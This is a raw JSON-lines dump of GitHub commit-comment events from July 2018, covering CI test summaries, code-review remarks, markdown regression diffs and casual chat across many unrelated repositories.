{"id":"7953950692","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29680160,"position":null,"line":null,"path":null,"commit_id":"c420eb1bb06e3fe01526496bcaf2fecc702f2fa4","created_at":"2018-07-12T05:01:02Z","updated_at":"2018-07-12T05:01:02Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - Win64-Windows-7-VisualStudio-14: OK (2771 of 2932 tests passed, 13 test warnings)\n\nMessages:\n\n * 14 tests had: AUD diffs.\n * 131 tests had: EIO diffs.\n * 96 tests had: ESO big diffs.\n * 160 tests had: Table big diffs.\n * 24 tests had: ERR diffs.\n * 57 tests had: MTR big diffs.\n * 21 tests had: ESO small diffs.\n * 17 tests had: MTR small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 462\n * Failed: 161\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c420eb1bb06e3fe01526496bcaf2fecc702f2fa4-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c420eb1bb06e3fe01526496bcaf2fecc702f2fa4-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.51%25-yellow.png)</a> \n"}},"created_at":"2018-07-12T05:01:02Z"}
{"id":"7953951408","type":"CommitCommentEvent","actor":{"login":"SQS-JLiu"},"repo":{"name":"SQS-JLiu/androidProjects"},"payload":{"comment":{"id":29680162,"position":null,"line":null,"path":null,"commit_id":"c62098cfcac329f47441a658e9b9691aac5e41db","created_at":"2018-07-12T05:01:19Z","updated_at":"2018-07-12T05:01:19Z","author_association":"OWNER","body":"use cases"}},"created_at":"2018-07-12T05:01:19Z"}
{"id":"7953954841","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29680166,"position":null,"line":null,"path":null,"commit_id":"f2f7c4287ff257e7c219737b0d7416a7965c0c3e","created_at":"2018-07-12T05:02:54Z","updated_at":"2018-07-12T05:02:54Z","author_association":"MEMBER","body":"@jwiegley please open an issue as that makes it easier to track"}},"created_at":"2018-07-12T05:02:54Z"}
{"id":"7953964828","type":"CommitCommentEvent","actor":{"login":"shuusan"},"repo":{"name":"whiteman4646/cooking-recipe"},"payload":{"comment":{"id":29680185,"position":null,"line":null,"path":null,"commit_id":"249715e674c9d7b6d9e6e728ec008a2068528e3b","created_at":"2018-07-12T05:07:18Z","updated_at":"2018-07-12T05:07:18Z","author_association":"COLLABORATOR","body":"カラーじゃなくカレーですよ！！"}},"created_at":"2018-07-12T05:07:18Z"}
{"id":"7953966743","type":"CommitCommentEvent","actor":{"login":"kivikakk"},"repo":{"name":"brson/comrak"},"payload":{"comment":{"id":29680187,"position":null,"line":null,"path":null,"commit_id":"ac3218b3af117fc5a061277015a1d10ca0575044","created_at":"2018-07-12T05:08:09Z","updated_at":"2018-07-12T05:08:09Z","author_association":"NONE","body":"I had a look at this vis-à-vis the \"regression tests\" we include in `cmark`; upstream has some, but we've added more in our fork; see https://github.com/github/cmark/blob/38cc7a439d592c7ff3e2e15b9e30a25679e151c4/test/regression.txt#L95-L127. We've ensured all combinations of emphasis work at least on the outside of a word — this is indeed the bare minimum.\r\n\r\n`comrak`'s CI script doesn't run these tests; I'm putting together a PR that a) does so, and b) corrects errors so-introduced. The above example currently fails:\r\n\r\n```diff\r\n--- expected HTML\r\n+++ actual HTML\r\n@@ -1,12 +1,12 @@\r\n-<p><del><strong><em><code>this</code></em></strong></del><br />\r\n-<del><em><strong><code>this</code></strong></em></del><br />\r\n-<del><em><strong><code>this</code></strong></em></del></p>\r\n+<p><del>**<em><code>this</code></em>**</del><br />\r\n+<del>***<code>this</code>***</del><br />\r\n+<del>___<code>this</code>___</del></p>\r\n <p><strong><em><code>this</code></em></strong><br />\r\n <em><strong><code>this</code></strong></em><br />\r\n <em><strong><code>this</code></strong></em></p>\r\n-<p><del><strong><em>this</em></strong></del><br />\r\n-<del><em><strong>this</strong></em></del><br />\r\n-<del><em><strong>this</strong></em></del></p>\r\n+<p><del>**<em>this</em>**</del><br />\r\n+<del>***this***</del><br />\r\n+<del>___this___</del></p>\r\n <p><strong><em>this</em></strong><br />\r\n <em><strong>this</strong></em><br />\r\n <em><strong>this</strong></em></p>\r\n```\r\n\r\nIncluding this commit makes it a bit better:\r\n\r\n```diff\r\n--- expected HTML\r\n+++ actual HTML\r\n@@ -1,12 +1,12 @@\r\n-<p><del><strong><em><code>this</code></em></strong></del><br />\r\n+<p><del>**<em><code>this</code></em>**</del><br />\r\n <del><em><strong><code>this</code></strong></em></del><br />\r\n-<del><em><strong><code>this</code></strong></em></del></p>\r\n+<del>___<code>this</code>___</del></p>\r\n <p><strong><em><code>this</code></em></strong><br />\r\n <em><strong><code>this</code></strong></em><br />\r\n <em><strong><code>this</code></strong></em></p>\r\n-<p><del><strong><em>this</em></strong></del><br />\r\n+<p><del>**<em>this</em>**</del><br />\r\n <del><em><strong>this</strong></em></del><br />\r\n-<del><em><strong>this</strong></em></del></p>\r\n+<del>___this___</del></p>\r\n <p><strong><em>this</em></strong><br />\r\n <em><strong>this</strong></em><br />\r\n <em><strong>this</strong></em></p>\r\n```\r\n\r\nNo new errors and two lines fixed, so I think we should include the change."}},"created_at":"2018-07-12T05:08:09Z"}
{"id":"7953966798","type":"CommitCommentEvent","actor":{"login":"whiteman4646"},"repo":{"name":"whiteman4646/cooking-recipe"},"payload":{"comment":{"id":29680188,"position":null,"line":null,"path":null,"commit_id":"249715e674c9d7b6d9e6e728ec008a2068528e3b","created_at":"2018-07-12T05:08:11Z","updated_at":"2018-07-12T05:08:11Z","author_association":"OWNER","body":"めっちゃ申し訳m(_ _)m"}},"created_at":"2018-07-12T05:08:11Z"}
{"id":"7953971604","type":"CommitCommentEvent","actor":{"login":"whitefire0"},"repo":{"name":"whitefire0/the-cave-machine"},"payload":{"comment":{"id":29680196,"position":10,"line":83,"path":"app.js","commit_id":"1b7f7335942abe93b07900bab8b70c128f065eea","created_at":"2018-07-12T05:10:18Z","updated_at":"2018-07-12T05:10:18Z","author_association":"OWNER","body":"It is more accurate to say 'a variable initialised to eventually contain the results of line 88'. It was initialised here as doing so on line 88 itself would not work.\r\n"}},"created_at":"2018-07-12T05:10:18Z"}
{"id":"7953976037","type":"CommitCommentEvent","actor":{"login":"whitefire0"},"repo":{"name":"whitefire0/the-cave-machine"},"payload":{"comment":{"id":29680204,"position":17,"line":90,"path":"app.js","commit_id":"1b7f7335942abe93b07900bab8b70c128f065eea","created_at":"2018-07-12T05:12:09Z","updated_at":"2018-07-12T05:12:09Z","author_association":"OWNER","body":"A template literal is syntax that gets evaluated to a string."}},"created_at":"2018-07-12T05:12:09Z"}
{"id":"7953976619","type":"CommitCommentEvent","actor":{"login":"milenasYN"},"repo":{"name":"milenasYN/Personal-projects"},"payload":{"comment":{"id":29680206,"position":null,"line":null,"path":null,"commit_id":"6ae110eba1d3ef814b46e2f6a27d6bfaccbc8e8b","created_at":"2018-07-12T05:12:23Z","updated_at":"2018-07-12T05:12:23Z","author_association":"OWNER","body":"Le but de ce travail est de mettre en pratique les concepts d’interface graphique (AWT et Swing). On aide NORDI-PNEUS, une entreprise spécialisée dans la vente et l’installation des pneus de marque Michelin, à développer un Système de Gestion de son Inventaire de pneus (SGI) en ajoutant des interfaces graphiques."}},"created_at":"2018-07-12T05:12:23Z"}
{"id":"7953977951","type":"CommitCommentEvent","actor":{"login":"mpcen"},"repo":{"name":"BurntSushi/nflgame"},"payload":{"comment":{"id":29680207,"position":null,"line":null,"path":null,"commit_id":"c9747ccb597d6c31f61e4002bc4bd9f45a05b064","created_at":"2018-07-12T05:12:56Z","updated_at":"2018-07-12T05:12:56Z","author_association":"NONE","body":"rip"}},"created_at":"2018-07-12T05:12:56Z"}
{"id":"7953980658","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29680212,"position":null,"line":null,"path":null,"commit_id":"70091875b188b6c001632d257fd30ccad8f68833","created_at":"2018-07-12T05:14:05Z","updated_at":"2018-07-12T05:14:05Z","author_association":"NONE","body":"BugFix-EMSAlphaAllocation (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1685 of 1685 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70091875b188b6c001632d257fd30ccad8f68833-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70091875b188b6c001632d257fd30ccad8f68833-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70091875b188b6c001632d257fd30ccad8f68833-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-12T05:14:05Z"}
{"id":"7953984188","type":"CommitCommentEvent","actor":{"login":"sven-n"},"repo":{"name":"MUnique/OpenMU"},"payload":{"comment":{"id":29680225,"position":null,"line":null,"path":null,"commit_id":"2e79aa24bed37035790a513bb795f4b588c8145b","created_at":"2018-07-12T05:15:33Z","updated_at":"2018-07-12T05:15:33Z","author_association":"MEMBER","body":"I guess it depends on preference... but you're right, it's not necessary that it checks the durability.\r\nI removed it with https://github.com/MUnique/OpenMU/commit/c399d7122aa75a9fda9eeaf0b2cb45aac489c884."}},"created_at":"2018-07-12T05:15:33Z"}
{"id":"7953984806","type":"CommitCommentEvent","actor":{"login":"dawnflyingnow"},"repo":{"name":"dawnflyingnow/blog"},"payload":{"comment":{"id":29680227,"position":null,"line":null,"path":null,"commit_id":"c0511aafc2000425e785519cb3a2c379bea88dfa","created_at":"2018-07-12T05:15:48Z","updated_at":"2018-07-12T05:15:48Z","author_association":"OWNER","body":"1111"}},"created_at":"2018-07-12T05:15:48Z"}
{"id":"7953989051","type":"CommitCommentEvent","actor":{"login":"whitefire0"},"repo":{"name":"whitefire0/the-cave-machine"},"payload":{"comment":{"id":29680236,"position":24,"line":102,"path":"app.js","commit_id":"f358c5903b256d0d5020823b7eb0c268d7a0be33","created_at":"2018-07-12T05:17:30Z","updated_at":"2018-07-12T05:17:30Z","author_association":"OWNER","body":"A falsy value is a value that translates to false when evaluated in a Boolean context. In the case of line 100, it is a comparison operator that directly produces the value of false.\r\n\r\ne.g. Boolean(0) // falsy\r\n       (1 > 0) // just false\r\n\r\nIn an in/else block, the evaluation only occurs after the if keyword.  Javascript then chooses which block of code to execute based on that. This might sound pedantic but I want to be sure you understand there is only one evaluation occurring here."}},"created_at":"2018-07-12T05:17:30Z"}
{"id":"7953991468","type":"CommitCommentEvent","actor":{"login":"yueye729"},"repo":{"name":"yueye729/mywork"},"payload":{"comment":{"id":29680238,"position":null,"line":null,"path":null,"commit_id":"1635136a2620e267b7e9232a14b94529aa89a2aa","created_at":"2018-07-12T05:18:27Z","updated_at":"2018-07-12T05:18:27Z","author_association":"OWNER","body":"地地道道"}},"created_at":"2018-07-12T05:18:27Z"}
{"id":"7953991937","type":"CommitCommentEvent","actor":{"login":"surhudm"},"repo":{"name":"rmurata/GalSim"},"payload":{"comment":{"id":29680240,"position":null,"line":null,"path":null,"commit_id":"e475e704fb02acbc7b34e4952944ee5692e5be71","created_at":"2018-07-12T05:18:38Z","updated_at":"2018-07-12T05:18:38Z","author_association":"NONE","body":"@rmurata, you do not need to have a trunc>0.0 \"if else statement\". Doesn't Sersic already recognize the trunc=None case?"}},"created_at":"2018-07-12T05:18:38Z"}
{"id":"7953994630","type":"CommitCommentEvent","actor":{"login":"nemosminer"},"repo":{"name":"nemosminer/NemosMiner"},"payload":{"comment":{"id":29680243,"position":null,"line":null,"path":null,"commit_id":"60da11d17d24df25a572de5f2a08cee1b77f39b7","created_at":"2018-07-12T05:19:37Z","updated_at":"2018-07-12T05:19:37Z","author_association":"OWNER","body":"thanks"}},"created_at":"2018-07-12T05:19:37Z"}
{"id":"7953995336","type":"CommitCommentEvent","actor":{"login":"zeltak"},"repo":{"name":"alphapapa/helm-org-rifle"},"payload":{"comment":{"id":29680246,"position":null,"line":null,"path":null,"commit_id":"a6324b7f5157e3e91a7993efb87ece6b9ca449a9","created_at":"2018-07-12T05:19:56Z","updated_at":"2018-07-12T05:19:56Z","author_association":"NONE","body":"@alphapapa \r\n\r\nthx for letting me know of the updates, of course ill be happy to test!\r\n\r\nare the changes already pushed to Melpa or do i need to clone the repo (sorry for being technically challenged :D))\r\n\r\nbest\r\n\r\nZ"}},"created_at":"2018-07-12T05:19:56Z"}
{"id":"7953996326","type":"CommitCommentEvent","actor":{"login":"zougloub"},"repo":{"name":"neuropoly/spinalcordtoolbox"},"payload":{"comment":{"id":29680250,"position":28,"line":1272,"path":"scripts/msct_image.py","commit_id":"003b3234df1a2eddc21e0957f9299e1f48ff6b31","created_at":"2018-07-12T05:20:18Z","updated_at":"2018-07-12T05:20:18Z","author_association":"CONTRIBUTOR","body":"Typo (`range`->`slice`)"}},"created_at":"2018-07-12T05:20:18Z"}
{"id":"7954000626","type":"CommitCommentEvent","actor":{"login":"rmurata"},"repo":{"name":"rmurata/GalSim"},"payload":{"comment":{"id":29680256,"position":null,"line":null,"path":null,"commit_id":"e475e704fb02acbc7b34e4952944ee5692e5be71","created_at":"2018-07-12T05:22:06Z","updated_at":"2018-07-12T05:22:06Z","author_association":"OWNER","body":"@surhudm I remember you said the default value for \"trunc\" was 0.0 in the previous email.\r\nI did not check that but I opt for a safer way.\r\n\r\nhttps://github.com/GalSim-developers/GalSim/issues/388\r\nhttps://github.com/GalSim-developers/GalSim/blob/releases/1.6/galsim/base.py"}},"created_at":"2018-07-12T05:22:06Z"}
{"id":"7954020724","type":"CommitCommentEvent","actor":{"login":"kouki2sin"},"repo":{"name":"Kadogu/cooking-recipe"},"payload":{"comment":{"id":29680323,"position":null,"line":null,"path":null,"commit_id":"435795dd71d49bbde66d23ac80eedf8c67e173d1","created_at":"2018-07-12T05:29:49Z","updated_at":"2018-07-12T05:29:49Z","author_association":"COLLABORATOR","body":"すいません　間違えて記入してしまいました"}},"created_at":"2018-07-12T05:29:49Z"}
{"id":"7954023369","type":"CommitCommentEvent","actor":{"login":"alphapapa"},"repo":{"name":"alphapapa/helm-org-rifle"},"payload":{"comment":{"id":29680337,"position":null,"line":null,"path":null,"commit_id":"a6324b7f5157e3e91a7993efb87ece6b9ca449a9","created_at":"2018-07-12T05:30:47Z","updated_at":"2018-07-12T05:30:47Z","author_association":"OWNER","body":"I don't know if the latest version is built in MELPA yet. If it's not now, it should be soon. "}},"created_at":"2018-07-12T05:30:47Z"}
{"id":"7954024649","type":"CommitCommentEvent","actor":{"login":"idsb3t1"},"repo":{"name":"idsb3t1/UI-ys1int-KEEP-TC"},"payload":{"comment":{"id":29680339,"position":null,"line":null,"path":null,"commit_id":"14abc49c326f76d6c89aa005c7bfea93664711e2","created_at":"2018-07-12T05:31:16Z","updated_at":"2018-07-12T05:31:16Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.stage1.bluemix.net/devops/toolchains/ee7af0c7-eb4b-4808-84ae-65a1ebf892f4?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\"): [Delivery Pipeline](https://console.stage1.bluemix.net/devops/pipelines/9602ba9a-db4c-42c8-81d1-69655e515efe?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\") deployed [UI-ys1int-KEEP-TC](https://github.com/idsb3t1/UI-ys1int-KEEP-TC/releases/tag/deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180712-053115 \"deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180712-053115\") to [dev](https://console.stage1.bluemix.net/apps/e0173942-fbb5-42df-a8ff-cca49f037241?env_id=ibm:ys1:us-south \"ibm:ys1:us-south:idsb3t2@us.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T05:31:16Z"}
{"id":"7954028485","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29680348,"position":null,"line":null,"path":null,"commit_id":"2608a894f3791f0e4e9e63173b3ae670f0493e5b","created_at":"2018-07-12T05:32:43Z","updated_at":"2018-07-12T05:32:43Z","author_association":"NONE","body":"issue_#6601_1 (mbadams5) - i386-Windows-7-VisualStudio-14: OK (2934 of 2934 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2608a894f3791f0e4e9e63173b3ae670f0493e5b-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2608a894f3791f0e4e9e63173b3ae670f0493e5b-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T05:32:43Z"}
{"id":"7954036983","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29680360,"position":null,"line":null,"path":null,"commit_id":"67fa3f30589b1bd4d98131223ba49d7d5971b970","created_at":"2018-07-12T05:36:04Z","updated_at":"2018-07-12T05:36:04Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/67fa3f30589b1bd4d98131223ba49d7d5971b970/index.html"}},"created_at":"2018-07-12T05:36:04Z"}
{"id":"7954039765","type":"CommitCommentEvent","actor":{"login":"whiteman4646"},"repo":{"name":"whiteman4646/cooking-recipe"},"payload":{"comment":{"id":29680366,"position":null,"line":null,"path":null,"commit_id":"acc20288e1f604bec132bcb0556a281bcd0757f5","created_at":"2018-07-12T05:36:51Z","updated_at":"2018-07-12T05:36:51Z","author_association":"OWNER","body":"完成おめ(祝)"}},"created_at":"2018-07-12T05:36:51Z"}
{"id":"7954043821","type":"CommitCommentEvent","actor":{"login":"teleivo"},"repo":{"name":"Bahmni/person-management-app"},"payload":{"comment":{"id":29680376,"position":1,"line":1,"path":".env","commit_id":"8263d5f2fddb96f3ca963df285c0e4426ee40b77","created_at":"2018-07-12T05:38:22Z","updated_at":"2018-07-12T05:38:22Z","author_association":"COLLABORATOR","body":"@edieblu @gtl90 this .env file is a personal file that each dev will create for themselves and put their credentials inside. Therefore this should not be shared. Please remove/ignore the file in git as described here https://help.github.com/articles/ignoring-files/\r\n\r\nhere is a repo with common gitignores you might take inspiration from or maybe there is one that fits https://github.com/github/gitignore\r\n\r\nalso you commited .DS_Store which is great to ignore as well\r\n\r\nAnd describe in the readme what someone new to the project needs to do to start the app :)"}},"created_at":"2018-07-12T05:38:22Z"}
{"id":"7954046110","type":"CommitCommentEvent","actor":{"login":"shuusan"},"repo":{"name":"whiteman4646/cooking-recipe"},"payload":{"comment":{"id":29680382,"position":null,"line":null,"path":null,"commit_id":"acc20288e1f604bec132bcb0556a281bcd0757f5","created_at":"2018-07-12T05:39:17Z","updated_at":"2018-07-12T05:39:17Z","author_association":"COLLABORATOR","body":"優しい世界（❚＿❚＊！）"}},"created_at":"2018-07-12T05:39:17Z"}
{"id":"7954047659","type":"CommitCommentEvent","actor":{"login":"dennyzhang"},"repo":{"name":"pivotal-cf/oratos-ci"},"payload":{"comment":{"id":29680385,"position":5,"line":19,"path":"tasks/go-test-with-latest-packages/task","commit_id":"502bd31226252a73d8c5ba6d3310313903c4a2e4","created_at":"2018-07-12T05:39:52Z","updated_at":"2018-07-12T05:39:52Z","author_association":"CONTRIBUTOR","body":"Some improvement: \r\nSC2046 Quote this to prevent word splitting\r\nhttps://github.com/koalaman/shellcheck/wiki/SC2046\r\n\r\n`go test \"$(eval \"$PKGS_HOOK\")\" -race`"}},"created_at":"2018-07-12T05:39:52Z"}
{"id":"7954048952","type":"CommitCommentEvent","actor":{"login":"githubuserdlp"},"repo":{"name":"githubuserdlp/TEST"},"payload":{"comment":{"id":29680388,"position":null,"line":null,"path":null,"commit_id":"ca9076bc653865997690d0e94ce94f52fff90ba9","created_at":"2018-07-12T05:40:19Z","updated_at":"2018-07-12T05:40:19Z","author_association":"OWNER","body":"\r\n{ENTER}\r\n[f12072018054005_download.txt](https://github.com/githubuserdlp/TEST/files/2187224/f12072018054005_download.txt)\r\n"}},"created_at":"2018-07-12T05:40:19Z"}
{"id":"7954050126","type":"CommitCommentEvent","actor":{"login":"shuusan"},"repo":{"name":"whiteman4646/cooking-recipe"},"payload":{"comment":{"id":29680392,"position":null,"line":null,"path":null,"commit_id":"d65f888adf0d7d3fd5348eb6e56f160375f34322","created_at":"2018-07-12T05:40:46Z","updated_at":"2018-07-12T05:40:46Z","author_association":"COLLABORATOR","body":"カレーじゃなくカラーですよ！！！"}},"created_at":"2018-07-12T05:40:46Z"}
{"id":"7954053564","type":"CommitCommentEvent","actor":{"login":"danowitz"},"repo":{"name":"danowitz/IndigoMQTTBridge"},"payload":{"comment":{"id":29680398,"position":null,"line":null,"path":null,"commit_id":"7bd0f6d34cf43cbf646f0c668c7b997fd328d185","created_at":"2018-07-12T05:42:02Z","updated_at":"2018-07-12T05:42:02Z","author_association":"OWNER","body":"update to 2.0.2"}},"created_at":"2018-07-12T05:42:02Z"}
{"id":"7954053746","type":"CommitCommentEvent","actor":{"login":"Sekva"},"repo":{"name":"Sekva/webPro"},"payload":{"comment":{"id":29680399,"position":null,"line":null,"path":null,"commit_id":"c243be7d1e0b4e7ec7ddc6a59cd30ecf9f12686b","created_at":"2018-07-12T05:42:06Z","updated_at":"2018-07-12T05:42:06Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [realizar post](https://trello.com/c/xMBZiFFE/8-realizar-post)"}},"created_at":"2018-07-12T05:42:06Z"}
{"id":"7954056759","type":"CommitCommentEvent","actor":{"login":"Arnish"},"repo":{"name":"ExtraConcentratedJuice/pokecord-catcher"},"payload":{"comment":{"id":29680404,"position":null,"line":null,"path":null,"commit_id":"2966c7ed6444802fd5bd721e85ed08b5ac4af428","created_at":"2018-07-12T05:43:13Z","updated_at":"2018-07-12T05:43:13Z","author_association":"NONE","body":"thank you so much!!"}},"created_at":"2018-07-12T05:43:13Z"}
{"id":"7954064627","type":"CommitCommentEvent","actor":{"login":"jekstrand"},"repo":{"name":"karolherbst/mesa"},"payload":{"comment":{"id":29680416,"position":7,"line":235,"path":"src/compiler/nir/nir_validate.c","commit_id":"fcb2c45ae856bfca77d7840f4ff6e1f2e2471673","created_at":"2018-07-12T05:46:05Z","updated_at":"2018-07-12T05:46:05Z","author_association":"NONE","body":"This hunk doesn't make sense to me.  Maybe it isn't needed?"}},"created_at":"2018-07-12T05:46:05Z"}
{"id":"7954068795","type":"CommitCommentEvent","actor":{"login":"jekstrand"},"repo":{"name":"karolherbst/mesa"},"payload":{"comment":{"id":29680424,"position":5,"line":92,"path":"src/compiler/nir/nir_print.c","commit_id":"fcb2c45ae856bfca77d7840f4ff6e1f2e2471673","created_at":"2018-07-12T05:47:39Z","updated_at":"2018-07-12T05:47:39Z","author_association":"NONE","body":"This doesn't make any sense.  I think the last three lines should all be +"}},"created_at":"2018-07-12T05:47:39Z"}
{"id":"7954070435","type":"CommitCommentEvent","actor":{"login":"Awzaw"},"repo":{"name":"r7vmc/ApiUpdaterDP"},"payload":{"comment":{"id":29680429,"position":null,"line":null,"path":null,"commit_id":"9f879560e3bdb6bd30e5a2a728930204a7fdcf0d","created_at":"2018-07-12T05:48:16Z","updated_at":"2018-07-12T05:48:16Z","author_association":"NONE","body":"Dear @r7vmc:\nI regret to inform you that the release you submitted, named \"**ApiUpdaterDP**\" (v3.0.0), for the project [ApiUpdaterDP](https://poggit.pmmp.io/ci/r7vmc/ApiUpdaterDP/ApiUpdaterDP) on 2018-07-11T23:59:42.000Z, has been rejected.\n\nThis plugin will not be accepted for release on Poggit because its only purpose is to negate PocketMine API checks, which exist for a very good reason. If the plugin were able to correctly update outdated code in addition to bumping API versions then it might be eligible for release.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-12T05:48:16Z"}
{"id":"7954070962","type":"CommitCommentEvent","actor":{"login":"emreakd"},"repo":{"name":"ayhanselek/GitTest"},"payload":{"comment":{"id":29680430,"position":null,"line":null,"path":null,"commit_id":"9bbbb83d60aff49a0aa71de2b259bb120a312c78","created_at":"2018-07-12T05:48:26Z","updated_at":"2018-07-12T05:48:26Z","author_association":"COLLABORATOR","body":"Arif Bey bu ne ??"}},"created_at":"2018-07-12T05:48:26Z"}
{"id":"7954071091","type":"CommitCommentEvent","actor":{"login":"cremieux"},"repo":{"name":"cremieux/LANSATC"},"payload":{"comment":{"id":29680431,"position":null,"line":null,"path":null,"commit_id":"260cc37bd005d7d2094a9cf9fb10ecca738464ea","created_at":"2018-07-12T05:48:28Z","updated_at":"2018-07-12T05:48:28Z","author_association":"OWNER","body":"Changed the caption for the webinar"}},"created_at":"2018-07-12T05:48:28Z"}
{"id":"7954072793","type":"CommitCommentEvent","actor":{"login":"dennyzhang"},"repo":{"name":"pivotal-cf/oratos-ci"},"payload":{"comment":{"id":29680435,"position":6,"line":23,"path":"docker-images/ci-base/Dockerfile","commit_id":"b5533f254853bb9d719837c6c0503fd65c35911a","created_at":"2018-07-12T05:49:06Z","updated_at":"2018-07-12T05:49:06Z","author_association":"CONTRIBUTOR","body":"Copy @wfernandes & @chentom88 \r\n\r\nTo speed up the ci-base image build, let's merge L23-L38 as one RUN batch. \r\nConsequently container-images::ci-base task can run faster.\r\n\r\nIf we want to make the image smaller, in the same RUN batch let's delete the zip files.\r\n\r\nAnd should we move L21 to the bottom?\r\n"}},"created_at":"2018-07-12T05:49:06Z"}
{"id":"7954073926","type":"CommitCommentEvent","actor":{"login":"bertholdreinwald"},"repo":{"name":"apache/systemml"},"payload":{"comment":{"id":29680437,"position":null,"line":null,"path":null,"commit_id":"58ab127619549b39a91480a79b087033a3f48b3a","created_at":"2018-07-12T05:49:30Z","updated_at":"2018-07-12T05:49:30Z","author_association":"CONTRIBUTOR","body":"Nope. \"Connection reset\" could be caused by many things: too many hits on repo, mvn version issue, networking issue, etc. I would retry, and if consistently fails, then we should contact travis-ci."}},"created_at":"2018-07-12T05:49:30Z"}
{"id":"7954075504","type":"CommitCommentEvent","actor":{"login":"Arnish"},"repo":{"name":"ExtraConcentratedJuice/pokecord-catcher"},"payload":{"comment":{"id":29680438,"position":null,"line":null,"path":null,"commit_id":"2966c7ed6444802fd5bd721e85ed08b5ac4af428","created_at":"2018-07-12T05:50:04Z","updated_at":"2018-07-12T05:50:04Z","author_association":"NONE","body":"\"EnableCatchResponse\": false,\r\n\"UserbotPrefix\": \"/\"\r\n\r\nOkay I removed the quotes and then added these as well, still doesn't work. The false part didn't work either Would you be able to help me on discord <3"}},"created_at":"2018-07-12T05:50:04Z"}
{"id":"7954081019","type":"CommitCommentEvent","actor":{"login":"Junefear"},"repo":{"name":"ayhanselek/GitTest"},"payload":{"comment":{"id":29680446,"position":null,"line":null,"path":null,"commit_id":"9bbbb83d60aff49a0aa71de2b259bb120a312c78","created_at":"2018-07-12T05:52:03Z","updated_at":"2018-07-12T05:52:03Z","author_association":"COLLABORATOR","body":"Boş dosya 🗡 "}},"created_at":"2018-07-12T05:52:03Z"}
{"id":"7954081919","type":"CommitCommentEvent","actor":{"login":"AnastasiaMazur"},"repo":{"name":"LexaLukivka/PartyMakerFrontend"},"payload":{"comment":{"id":29680447,"position":53,"line":53,"path":"package.json","commit_id":"113a87391ee44004b3ddb8ab883a91677227ff42","created_at":"2018-07-12T05:52:23Z","updated_at":"2018-07-12T05:52:23Z","author_association":"NONE","body":"что такое rimraf?"}},"created_at":"2018-07-12T05:52:23Z"}
{"id":"7954084668","type":"CommitCommentEvent","actor":{"login":"pavliha"},"repo":{"name":"LexaLukivka/PartyMakerFrontend"},"payload":{"comment":{"id":29680453,"position":53,"line":53,"path":"package.json","commit_id":"113a87391ee44004b3ddb8ab883a91677227ff42","created_at":"2018-07-12T05:53:22Z","updated_at":"2018-07-12T05:53:22Z","author_association":"NONE","body":"что такое rimraf?"}},"created_at":"2018-07-12T05:53:22Z"}
{"id":"7954088758","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"zlatinb/muwire"},"payload":{"comment":{"id":29680462,"position":11,"line":10,"path":"host-cache/src/main/groovy/com/muwire/hostcache/HostCache.groovy","commit_id":"a0d6eb6dd9e84b237dcc3c5f60d499327e16f79f","created_at":"2018-07-12T05:54:52Z","updated_at":"2018-07-12T05:54:52Z","author_association":"NONE","body":"😂"}},"created_at":"2018-07-12T05:54:52Z"}
{"id":"7954089870","type":"CommitCommentEvent","actor":{"login":"dmitrybubyakin"},"repo":{"name":"platinize/movie-rental"},"payload":{"comment":{"id":29680466,"position":7,"line":11,"path":"composer.json","commit_id":"e0100eccf1e6a74b5f48cb786c31492be0cc288b","created_at":"2018-07-12T05:55:13Z","updated_at":"2018-07-12T05:55:13Z","author_association":"NONE","body":"Форматирование"}},"created_at":"2018-07-12T05:55:13Z"}
